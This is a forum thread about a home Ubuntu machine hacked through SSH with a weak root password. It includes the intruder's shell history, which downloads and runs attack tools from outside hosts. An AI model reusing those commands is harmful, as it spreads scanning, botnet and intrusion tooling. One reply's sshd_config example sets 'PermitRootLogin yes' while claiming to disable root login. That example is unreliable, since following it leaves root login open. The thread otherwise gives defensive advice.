Arrggh my Ubuntu Desktop got hacked

[Other Pineapple Smurf]

Yes, it happened but b4 the Windowze fanboiz start throwing insults it was a security oversight on my side.

I setup my router to port forward my dyndns account to my desktop via ssh. Then I left my root password as "root"

Ooopppss

Picked up the hack after I noticed my CPU was going ape and ./pscan2 was running (?). I try to run "last" and get a rather odd error msg, log file is missing, oh no I'z beenz hackedz.

Tried to su to root and verstaan nie die password nie. So I quickly "sudo passwd root" (I'm a sudo fan) and the world is a happy place after a reboot.

Lesson learnt.

 

[Other Pineapple Smurf]

Checked my history and this is what the guy did:

passwd
w
ps x
wget
eth0
ifconfig
screen
w
cat /proc/cpuinfo
wget http://freewebs.com/blacksnakee/unixcod.tar.gz
tar zxvf unixcod.tar.gz
cd unixcod
./unix 41.242
./unix 41.243
./unix 41.244
./unix 41.246
./unix 41.247
cd ..
ifconfig
ls
ifconfig eth0 up 41.240.9.189
wget http://gblteam.webs.com/gosh.tgz.tar
tar -zxvf gosh.tgz.tar
cd gosh
./go.sh 84
cd
ls
rm -rf gosh gosh.tgz.tar
wget http://microcad.org/.hack/emech.zip
unzip emech.zip
cd emech
chmod +x *
./bash
cd
ls
w
wget http://tengere.webs.com/bnc/flegma.tgz
tar zxvf flegma.tgz
cd flegma
nohup ./start 51 >> /dev/null &

 

[MyWorld]

Well, you did leave the door wide open.

 

[koffiejunkie]

Laat dit 'n les wees! Rormat and re-install. Once someone got root on your box, you can not trust any logs or shell history. And if you really need ssh to be open from outside, put ssh on a random port and disable root login in /etc/ssh/sshd_config:

Port 10852
PermitRootLogin yes

Replace 10852 with a number between 1024 and 65535

 

[Tinuva]

Also a good idea is, install fail2ban once you do have a good password on, at least the guy gets automatically banned on iptables after 3 wrong passwords, making bruteforce attacks almost useless.

 

[sn3rd]

You got VERY lucky...

 

[ponder]

Then I left my root password as "root"

/facepalm

 

[FacELesS.]

Anyone had a look at those files he downloaded?
I noticed many password lists, IP lists and some IRC stuff, but it would be interesting if someone can explain what some of the other things do.

 

[kingrob]

**** happens.

 

[koffiejunkie]

Anyone had a look at those files he downloaded?
I noticed many password lists, IP lists and some IRC stuff, but it would be interesting if someone can explain what some of the other things do.

I have (I always do when I encounter a compromised box). Will look at it tonight, but I can tell you from experience, the intended use would have been one of the following:

1. launching ssh or pop3 brute force attacks against other hosts
2. sending spam
3. taking part in a DDOS
4. botnet control

 

[Fudzy]

What sort of barriers are in place to stop noobs/DFUs from doing the same thing?

 

[koffiejunkie]

What sort of barriers are in place to stop noobs/DFUs from doing the same thing?

There is no patch for stupidity.

 

[MyWorld]

There is no patch for stupidity.

HAHAHAHAHAHA
Made my day there koffiejunkie!

Hang on, I thought Ubuntu WAS the patch?
/me takes a cheap shot at everyone not using distro X

Replace X with preferred distro, obviously anything goes except Ubuntu.

Years ago with ISDN and using a normal cheap PII as a firewall and router we used to post our IPTables and auth logs on IRC to see who was trying to hack who. Was quite fun to see them try and fail. Of course with ISDN you only had connectivity for a night (7-7) so any attempt (even with a weak password) was utterly useless.
Back then the attempts numbered in the hundreds over a single night. Since I quit IRC and most online chat services that number has dropped considerably.

 

[Veroland]

So, I guess you won't want to give us your ip and path net to netcat by any chance

 

[w1z4rd]

Ubuntu doesnt have a root login though...

 

[kingrob]

Replace X with preferred distro, obviously anything goes except Ubuntu.

LOL...Ubuntu is actually one of the few Linux distros that locks the root account by default.

 

[Other Pineapple Smurf]

Yup, I make serious facepalm.

Box has been compromised and I have no idea what has been done to it. Most likely a backdoor has been created. Solution is to re-install - thats our policy at the office.

Going to set a different port for ssh too and also will not allow root login and limit remote login to specific user.

 

[The_Unbeliever]

If it was a whinydoze box, you wouldn't have known about the hack.

it is easier hacking windows than any kind of linux/unix box with proper security.

 

[The_Unbeliever]

Box has been compromised and I have no idea what has been done to it. Most likely a backdoor has been created. Solution is to re-install - thats our policy at the office.

Yes, that'll be the safest thing to do.

Lesson learnt. Now life can go on.

 

[cpu.]

Now I know why I can't delete my terminal history with history -c anymore. Probably explain why the OP still had that.

I cancelled my Dyndns.org usage after 2 days. My router security log was going crazy. At least all my passwords are configured and rootlogin disallowed.